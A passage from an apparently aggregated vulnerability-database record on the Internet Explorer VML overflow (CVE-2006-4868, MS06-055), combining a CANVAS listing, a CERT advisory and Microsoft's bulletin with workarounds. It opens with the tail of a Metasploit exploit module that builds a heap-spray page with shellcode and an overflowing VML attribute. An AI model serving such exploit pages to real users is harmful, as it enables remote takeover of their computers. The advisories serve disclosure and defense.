address\n addr_word = [target.ret].pack('V').unpack('H*')[0][0,4]\n\n # Select a random VML element to use\n vmls = %w{ rect roundrect line polyline oval image arc curve }\n vmlelem = vmls[ rand(vmls.length) ]\n\n # The overflow buffer for the method attribute\n buffer = (\"&#x\" + addr_word + \";\") * buflen\n\n # Generate a random XML namespace for VML\n xmlns = rand_text_alpha(rand(30)+2)\n\n # Randomize the javascript variable names\n var_buffer = rand_text_alpha(rand(30)+2)\n var_shellcode = rand_text_alpha(rand(30)+2)\n var_unescape = rand_text_alpha(rand(30)+2)\n var_x = rand_text_alpha(rand(30)+2)\n var_i = rand_text_alpha(rand(30)+2)\n\n # Build out the message\n content = %Q|\n<html xmlns:#{xmlns} = \" urn:schemas-microsoft-com:vml \" >\n<head>\n<style> #{xmlns}\\\\:* { behavior: url(#default#VML) ; } </style>\n<body>\n<script>\n\n var #{var_unescape} = unescape ;\n var #{var_shellcode} = #{var_unescape}( \"#{shellcode}\" ) ;\n\n var #{var_buffer} = #{var_unescape}( \"%u#{addr_word}\" ) ;\n while (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ;\n\n var #{var_x} = new Array() ;\n for ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) {\n #{var_x}[ #{var_i} ] =\n #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +\n #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +\n #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +\n #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;\n }\n\n</script>\n<#{xmlns}:#{vmlelem}>\n <#{xmlns}:fill method = \"#{buffer}\" />\n</#{xmlns}:#{vmlelem}>\n\n</body>\n</html>\n |\n\n content = Rex::Text.randomize_space(content)\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms06_055_vml_method.rb"}], "canvas": [{"lastseen": "2019-05-29T17:19:23", "bulletinFamily": "exploit", "description": "**Name**| ms06_055 \n---|--- \n**CVE**| CVE-2006-4868 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Internet Explorer Vector Markup Language Overflow \n**Notes**| CVE Name: CVE-2006-4868 \nVENDOR: Microsoft \nMSADV: MS06-055 \nVersionsAffected: \nRepeatability: Infinite \nReferences: http://www.microsoft.com/technet/security/Bulletin/MS06-055.mspx \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4868 \nDate public: 09/26/06 \nCVSS: 9.3 \n\n", "modified": "2006-09-19T19:07:00", "published": "2006-09-19T19:07:00", "id": "MS06_055", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms06_055", "title": "Immunity Canvas: MS06_055", "type": "canvas", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2019-10-09T19:51:24", "bulletinFamily": "info", "description": "### Overview \n\nMicrosoft Internet Explorer ([_IE_](<http://www.microsoft.com/windows/ie/default.mspx>)) fails to properly handle Vector Markup Language tags. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nMicrosoft IE version 5.0 and higher supports the Vector Markup Language [(VML](<http://msdn.microsoft.com/workshop/author/vml/SHAPE/introduction.asp>)), which is a set of XML tags for drawing vector graphics. IE fails to properly handle malformed VML tags allowing a stack buffer overflow to occur. If a remote attacker can persuade a user to access a specially crafted web page with IE, that attacker may be able to trigger the buffer overflow. In addition, an attacker could deliver an HTML email message or entice a user to select an HTML document in Windows Explorer. \n\nOn Windows XP SP2 systems the vulnerable component (VGX.DLL) is compiled with the[ /GS](<http://msdn2.microsoft.com/en-US/library/8dbf701c.aspx>) (Buffer Security Check) flag. However, exploits using techniques to circumvent the Buffer Security Check are publicly available. \n \nNote that this vulnerability is actively being exploited. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker can execute arbitrary code on a vulnerable system. \n \n--- \n \n### Solution \n\n**Apply the update from Microsoft**\n\nMicrosoft addresses this vulnerability with the update listed in Microsoft Security Bulletin [MS06-055](<http://www.microsoft.com/technet/security/Bulletin/MS06-055.mspx>). \n \n--- \n \nUntil the update can be applied, consider the following workarounds:\n\n \n**Disable VML support** \n \nMicrosoft Security Advisory ([925568](<http://www.microsoft.com/technet/security/advisory/925568.mspx>)) suggests the following techniques to disable VML support: \n[](<javascript:Toggle\\('s11l3-EJG'\\)>)[](<javascript:Toggle\\('s11l3-EJG'\\)>)\n\n * Un-register Vgx.dll on Windows XP Service Pack 1; Windows XP Service Pack 2; Windows Server 2003 and Windows Server 2003 Service Pack 1[](<javascript:Toggle\\('s11l3-ESH'\\)>)[](<javascript:Toggle\\('s11l3-ESH'\\)>)\n * Modify the Access Control List on Vgx.dll to be more restrictive\n * Configure Internet Explorer 6 for Microsoft Windows XP Service Pack 2 to disable Binary and Script Behaviors in the Internet and Local Intranet security zone\n**Do not follow unsolicited links** \n \nIn order to convince users to visit their sites, attackers often use URL encoding, IP address variations, long URLs, intentional misspellings, and other techniques to create misleading links. Do not click on unsolicited links received in email, instant messages, web forums, or internet relay chat (IRC) channels. Type URLs directly into the browser to avoid these misleading links. While these are generally good security practices, following these behaviors will not prevent exploitation of this vulnerability in all cases, particularly if a trusted site has been compromised or allows cross-site scripting. \n \n**Disable Active Scripting** \n \nAlthough this vulnerability does not require Active Scripting to be enabled, known exploits targeting this issue use Active Scripting to place malicious code on a vulnerable system. To block this attack vector, it is recommended that Active Scripting be disabled. For instructions on how to disable Active Scripting in Microsoft Internet Explorer, please refer to the Internet Explorer section of the [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/>) document. \n \n**Read and send email in plain text format** \n \nAn attacker may be able to exploit this vulnerability by convincing a user to open a specially crafted HTML email. Only reading email in plaintext will prevent exploitation of this vulnerability through email. Consider the security of fellow Internet users and send email in plain text format when possible. \n \nIf you use Microsoft Outlook, we encourage you to apply the Outlook Email Security Update. The update configures Outlook to open email messages in the Restricted Sites Zone, where Active scripting is disabled by default. In addition, the update provides further protection against malicious code that attempts to propagate via Outlook. The Outlook Email Security Update is available for [Outlook 98](<http://office.microsoft.com/downloads/9798/Out98sec.aspx>) and [Outlook 2000](<http://office.microsoft.com/downloads/2000/Out2ksec.aspx>). The functionality of the Outlook Email Security Update is included in Outlook 2002 and Outlook Express 6. Outlook 2003 includes these and other security enhancements. \n \n**Configure Windows Explorer to use Windows Classic Folders** \n \nWhen Windows Explorer is configured to use the \"Show common tasks in folders\" option, HTML within a file may be processed when that file is selected. If the \"Show common tasks in folders\" is enabled, selecting a specially crafted HTML document in Windows Explorer may trigger this vulnerability. Note that the \"Show common tasks in folders\" is enabled by default. To mitigate this attack vector, enable the \"Use Windows classic folders\" option. To enable this option in Windows Explorer: \n\n\n * Open Windows Explorer\n * Select Folder Options from the Tools menu\n * Select the \"Use Windows classic folders\" option in the Tasks section \n--- \n \n### Vendor Information\n\n416092\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Microsoft Corporation\n\nUpdated: September 27, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.microsoft.com/technet/security/advisory/925568.mspx> and <http://www.microsoft.com/technet/security/Bulletin/MS06-055.mspx>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23416092 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/Bulletin/MS06-055.mspx>\n * <http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-being.html>\n * <http://msdn.microsoft.com/workshop/author/vml/SHAPE/introduction.asp>\n * <http://www.microsoft.com/technet/security/advisory/925568.mspx>\n\n### Acknowledgements\n\nThis vulnerability was reported by Sunbelt Software.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-4868](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4868>) \n---|--- \n**Severity Metric:****** | 46.28 \n**Date Public:** | 2006-09-18 \n**Date First Published:** | 2006-09-19 \n**Date Last Updated: ** | 2007-03-21 20:22 UTC \n**Document Revision: ** | 72 \n", "modified": "2007-03-21T20:22:00", "published": "2006-09-19T00:00:00", "id": "VU:416092", "href": "https://www.kb.cert.org/vuls/id/416092", "type": "cert", "title": "Microsoft Internet Explorer VML stack buffer overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "description": "Microsoft Security Bulletin MS06-055\r\nVulnerability in Vector Markup Language Could Allow Remote Code Execution (925486)\r\nPublished: September 26, 2006\r\n\r\nVersion: 1.0\r\nSummary\r\n\r\nWho Should Read this Document: Customers who use Microsoft Windows\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately\r\n\r\nSecurity Update Replacement: This bulletin replaces a prior security update. See the frequently asked questions (FAQ) section of this bulletin for the complete list.\r\n\r\nCaveats: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 1 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 2 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Professional x64 Edition \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 x64 Edition \u2014 Download the update\r\n\r\nTested Microsoft Windows Components:\r\n\r\nAffected Components:\r\n\u2022\t\r\n\r\nInternet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4 \u2014 Download the update\r\n\u2022\t\r\n\r\nInternet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4 \u2014 Download the update\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nNote The security updates for Microsoft Windows Server 2003, Windows Server 2003 Service Pack 1, and Windows Server 2003 x64 Edition also apply to Windows Server 2003 R2.\r\nTop of sectionTop of section\r\nGeneral Information\r\n\t\r\nExecutive Summary\r\n\r\nExecutive Summary:\r\n\r\nThis update resolves a public vulnerability as well as additional issues discovered through internal investigations. The vulnerability is documented in the "Vulnerability Details" section of this bulletin.\r\n\r\nIf a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWe recommend that customers apply the update immediately.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\nVulnerability Identifiers\tImpact of Vulnerability\tWindows 2000 Service Pack 4\tWindows XP Service Pack 1\tWindows XP Service Pack 2\tWindows Server 2003\tWindows Server 2003 Service Pack 1\r\n\r\nVML Buffer Overrun Vulnerability - CVE-2006-4868\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nModerate\r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nNote By default, Internet Explorer on Windows Server 2003 runs in a restricted mode that is known as Enhanced Security Configuration. See the FAQ section for this security update for more information about Internet Explorer Enhanced Security Configuration.\r\n\r\nNote The severity ratings for non-x86 operating system versions map to the x86 operating systems versions as follows:\r\n\u2022\t\r\n\r\nThe Windows XP Professional x64 Edition severity rating is the same as the Windows Server XP Service Pack 2.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 for Itanium-based Systems severity rating is the same as the Windows Server 2003 severity rating.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 with SP1 for Itanium-based Systems severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 x64 Edition severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nCan I deploy this security update after I have applied the workarounds provided in Microsoft Security Advisory 925568?\r\nIf the workaround \u201cModify the Access Control List on Vgx.dll to be more restrictive\u201d has been applied to systems, the security updates provided with this security bulletin may not install correctly. See the Workarounds for VML Buffer Overrun Vulnerability \u2013 CVE-2006-4868 section in this security bulletin for instructions on how to revert this workaround before applying this security update.\r\n\r\nWhat updates does this release replace?\r\nThis security update replaces a prior security update. The security bulletin ID and affected operating systems are listed in the following table.\r\nBulletin ID\tWindows 2000 Service Pack 4\tWindows 2000 Service Pack 4 with Internet Explorer 6 Service Pack 1 Installed\tWindows XP Service Pack 1\tWindows XP Service Pack 2\tWindows Server 2003\tWindows Server 2003 Service Pack 1\r\n\r\nMS04-028\r\n\t\r\n\r\nNot Replaced\r\n\t\r\n\r\nReplaced\r\n\t\r\n\r\nNot Replaced\r\n\t\r\n\r\nNot Replaced\r\n\t\r\n\r\nNot Replaced\r\n\t\r\n\r\nNot Replaced\r\n\r\nWhy are the security updates for Windows XP Service Pack 1 and Windows 2000 Service Pack 4 labeled as Internet Explorer Updates?\r\nWhile this is a security update for Windows, the files are serviced from the Internet Explorer code base on these platforms. As such, it follows Internet Explorer standards for packaging as well as detection and deployment.\r\n\r\nWhat is the Internet Explorer Enhanced Security Configuration?\r\nInternet Explorer Enhanced Security Configuration is a group of preconfigured Internet Explorer settings that reduce the likelihood of a user or of an administrator downloading and running specially crafted Web content on a server. Internet Explorer Enhanced Security Configuration reduces this risk by modifying many security-related settings. This includes the settings on the Security tab and the Advanced tab in the Internet Options dialog box. Some of the important modifications include the following:\r\n\u2022\t\r\n\r\nSecurity level for the Internet zone is set to High. This setting disables scripts, ActiveX controls, Microsoft Java Virtual Machine (MSJVM), and file downloads.\r\n\u2022\t\r\n\r\nAutomatic detection of intranet sites is disabled. This setting assigns all intranet Web sites and all Universal Naming Convention (UNC) paths that are not explicitly listed in the Local intranet zone to the Internet zone.\r\n\u2022\t\r\n\r\nInstall On Demand and non-Microsoft browser extensions are disabled. This setting prevents Web pages from automatically installing components and prevents non-Microsoft extensions from running.\r\n\u2022\t\r\n\r\nMultimedia content is disabled. This setting prevents music, animations, and video clips from running.\r\n\r\nThe Internet Explorer Enhanced Security Configuration does not provide mitigation for applications like Microsoft Outlook which can be installed on Windows Server 2003.\r\n\r\nExtended security update support for Microsoft Windows 98, Windows 98 Second Edition, or Windows Millennium Edition ended on July 11, 2006. I am still using one of these operating systems; what should I do?\r\nWindows 98, Windows 98 Second Edition, and Windows Millennium Edition have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nExtended security update support for Microsoft Windows NT Workstation 4.0 Service Pack 6a and Windows 2000 Service Pack 2 ended on June 30, 2004. Extended security update support for Microsoft Windows NT Server 4.0 Service Pack 6a ended on December 31, 2004. Extended security update support for Microsoft Windows 2000 Service Pack 3 ended on June 30, 2005. I am still using one of these operating systems; what should I do?\r\nWindows NT Workstation 4.0 Service Pack 6a, Windows NT Server 4.0 Service Pack 6a, Windows 2000 Service Pack 2, and Windows 2000 Service Pack 3 have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require custom support for these products must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) to determine whether this update is required?\r\nThe following table provides the MBSA detection summary for this security update.\r\nProduct\tMBSA 1.2.1\tEnterprise Scanning Tool (EST)\tMBSA 2.0\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 x64 Edition family\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nFor more information about MBSA, visit the MBSA Web site. For more information about the programs that Microsoft Update and MBSA 2.0 currently do not detect, see Microsoft Knowledge Base Article 895660.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\n\r\nWhat is the Enterprise Update Scan Tool (EST)?\r\nAs part of an ongoing commitment to provide detection tools for bulletin-class security updates, Microsoft delivers a stand-alone detection tool whenever the Microsoft Baseline Security Analyzer (MBSA) and the Office Detection Tool (ODT) cannot detect whether the update is required for an MSRC release cycle. This stand-alone tool is called the Enterprise Update Scan Tool (EST) and is designed for enterprise administrators. When a version of the Enterprise Update Scan Tool is created for a specific bulletin, customers can run the tool from a command line interface (CLI) and view the results of the XML output file. To help customers better utilize the tool, detailed documentation will be provided with the tool. There is also a version of the tool that offers an integrated experience for SMS administrators.\r\n\r\nCan I use a version of the Enterprise Update Scan Tool (EST) to determine whether this update is required?\r\nYes. Microsoft has created a version of the EST that will determine if you have to apply this update. For download links and more information about the version of the EST that is being released this month, see the following Microsoft Web site. SMS customers should review the "Can I use Systems Management Server (SMS) to determine whether this update is required?" FAQ for more information about SMS and EST.\r\n\r\nCan I use Systems Management Server (SMS) to determine whether this update is required?\r\nThe following table provides the SMS detection summary for this security update.\r\nProduct\tSMS 2.0\tSMS 2003\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nYes (With EST)\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\r\n\t\r\n\r\nYes (With EST)\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nYes (With EST)\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 x64 Edition family\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nSMS 2.0 and SMS 2003 Software Update Services (SUS) Feature Pack can use MBSA 1.2.1 for detection and therefore have the same limitation that is listed earlier in this bulletin related to programs that MBSA 1.2.1 does not detect.\r\n\r\nFor SMS 2.0, the SMS SUS Feature Pack, which includes the Security Update Inventory Tool (SUIT), can be used by SMS to detect security updates. SMS SUIT uses the MBSA 1.2.1 engine for detection. For more information about SUIT, visit the following Microsoft Web site. For more information about the limitations of SUIT, see Microsoft Knowledge Base Article 306460. The SMS SUS Feature Pack also includes the Microsoft Office Inventory Tool to detect required updates for Microsoft Office applications.\r\n\r\nFor SMS 2003, the SMS 2003 Inventory Tool for Microsoft Updates (ITMU) can be used by SMS to detect security updates that are offered by Microsoft Update and that are supported by Windows Server Update Services. For more information about the SMS 2003 ITMU, visit the following Microsoft Web site. SMS 2003 can also use the Microsoft Office Inventory Tool to detect required updates for Microsoft Office applications.\r\n\r\nFor more information about SMS, visit the SMS Web site.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\nTop of sectionTop of section\r\n\t\r\nVulnerability Details\r\n\t\r\nVML Buffer Overrun Vulnerability - CVE-2006-4868:\r\n\r\nA remote code execution vulnerability exists in the Vector Markup Language (VML) implementation in Microsoft Windows. An attacker could exploit the vulnerability by constructing a specially crafted Web page or HTML e-mail that could potentially allow remote code execution if a user visited the Web page or viewed the message. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\t\r\nMitigating Factors for VML Buffer Overrun Vulnerability - CVE-2006-4868:\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to persuade users to visit the Web site, typically by getting them to click a link in an e-mail message or instant messenger message that takes users to the attacker's Web site.\r\n\u2022\t\r\n\r\nIn an e-mail based attack of this exploit, customers who read e-mail in plain text are at less risk from this vulnerability. Instead users would have to either click on a link that would take them to a malicious Web site or open an attachment to be at risk from this vulnerability.\r\n\u2022\t\r\n\r\nIn an e-mail based attack of this exploit, customers who read e-mail using Outlook Express on Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1, are at less risk from this vulnerability because Binary and Script Behaviors is disabled by default in the Restricted sites zone.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 runs in a restricted mode that is known as Enhanced Security Configuration. This mode mitigates this vulnerability in Windows Server 2003 Service Pack 1 because Binary and Script Behaviors is disabled by default in the Internet zone.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 runs in a restricted mode that is known as Enhanced Security Configuration. This mode mitigates this vulnerability in the e-mail vector for Outlook Express because reading e-mail messages in plain text is the default configuration. See the FAQ section of this security update for more information about Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for VML Buffer Overrun Vulnerability - CVE-2006-4868:\r\n\r\nMicrosoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\u2022\t\r\n\r\nUnregister VGX.DLL\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type "%SystemRoot%\System32\regsvr32.exe" -u "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll", and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nA dialog box appears to confirm that the un-registration process has succeeded. Click OK to close the dialog box.\r\n\r\nImpact of Workaround: Applications that render VML will no longer do so once vgx.dll has been unregistered.\r\n\r\nThis security update does not automatically re-register vgx.dll so any applications that render VML will no longer do so until vgx.dll has been re-registered. To re-register vgx.dll follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type "%SystemRoot%\System32\regsvr32.exe" "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll", and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nA dialog box appears to confirm that the registration process has succeeded. Click OK to close the dialog box.\r\n\u2022\t\r\n\r\nModify the Access Control List on VGX.DLL to be more restrictive\r\n\r\nApplying this workaround may cause the installation of security updates provided with this security bulletin to fail:\r\n\r\nTo modify the Access Control List (ACL) on vgx.dll to be more restrictive, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type "cmd" (without the quotation marks), and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nType the following command at a command prompt make a note of the current ACL\u2019s that are on the file (including inheritance settings) for future reference to undo this modification:\r\n\r\ncacls "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll"\r\n\r\n3.\r\n\t\r\n\r\nType the following command at a command prompt to deny the \u2018everyone\u2019 group access to this file:\r\n\r\necho y| cacls "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll" /d everyone\r\n\r\n4.\r\n\t\r\n\r\nClose Internet Explorer, and reopen it for the changes to take effect.\r\n\r\nImpact of Workaround: Applications and Web sites that render VML may no longer display or function correctly.\r\n\r\nBefore this security update can be installed, this workaround must be reverted to the previous ACL configuration for vgx.dll. To revert to the previous vgx.dll ACL\u2019s follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type "cmd" (without the quotation marks), and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nTo revert to the previous ACL configuration for vgx.dll, type the following command and replace previous with the ACL\u2019s recorded in step 2 of this workaround:\r\n\r\necho y| cacls "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll" /g previous\r\n\r\n3.\r\n\t\r\n\r\nClose Internet Explorer, and reopen it for the changes to take effect.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer 6 for Microsoft Windows XP Service Pack 2 to disable Binary and Script Behaviors in the Internet and Local Intranet security zone\r\n\r\nYou can help protect against this vulnerability by changing your settings to disable binary and script behaviors in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the ActiveX controls and plug-ins section, under Binary and Script Behaviors, click Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the ActiveX controls and plug-ins section, under Binary and Script Behaviors, click Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nImpact of Workaround: Disabling binary and script behaviors in the Internet and Local intranet security zones may cause some Web sites that rely on VML to not function correctly.\r\n\u2022\t\r\n\r\nRead e-mail messages in plain text format if you are using Outlook 2002 or a later version, or Outlook Express 6 SP1 or a later version, to help protect yourself from the HTML e-mail attack vector\r\n\r\nMicrosoft Outlook 2002 users who have applied Office XP Service Pack 1 or a later version and Microsoft Outlook Express 6 users who have applied Internet Explorer 6 Service Pack 1 or a later version can enable this setting and view e-mail messages that are not digitally signed or e-mail messages that are not encrypted in plain text only.\r\n\r\nDigitally signed e-mail messages or encrypted e-mail messages are not affected by the setting and may be read in their original formats. For more information about how to enable this setting in Outlook 2002, see Microsoft Knowledge Base Article 307594.\r\n\r\nFor information about this setting in Outlook Express 6, see Microsoft Knowledge Base Article 291387.\r\n\r\nImpact of Workaround: E-mail messages that are viewed in plain text format will not contain pictures, specialized fonts, animations, or other rich content. Additionally:\r\n\u2022\t\r\n\r\nThe changes are applied to the preview pane and to open messages.\r\n\u2022\t\r\n\r\nPictures become attachments so that they are not lost.\r\n\u2022\t\r\n\r\nBecause the message is still in Rich Text or HTML format in the store, the object model (custom code solutions) may behave unexpectedly.\r\n\u2022\t\r\n\r\nBlock VML Vulnerability Traffic with ISA Server\r\n\r\nCustomers with Microsoft Internet Security and Acceleration (ISA) Server 2004 or 2006 may also block malicious traffic intended to exploit this vulnerability. For more information about how to enable this setting in ISA Server, see Learn How Your ISA Server Helps Block VML Vulnerability Traffic.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for VML Buffer Overrun Vulnerability - CVE-2006-4868:\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability in the Vector Markup Language (VML) implementation in Microsoft Windows. An attacker could exploit the vulnerability by constructing a specially crafted Web page or HTML e-mail that could potentially allow remote code execution if a user visited the Web page or viewed the message.\r\n\r\nIf a user were logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts 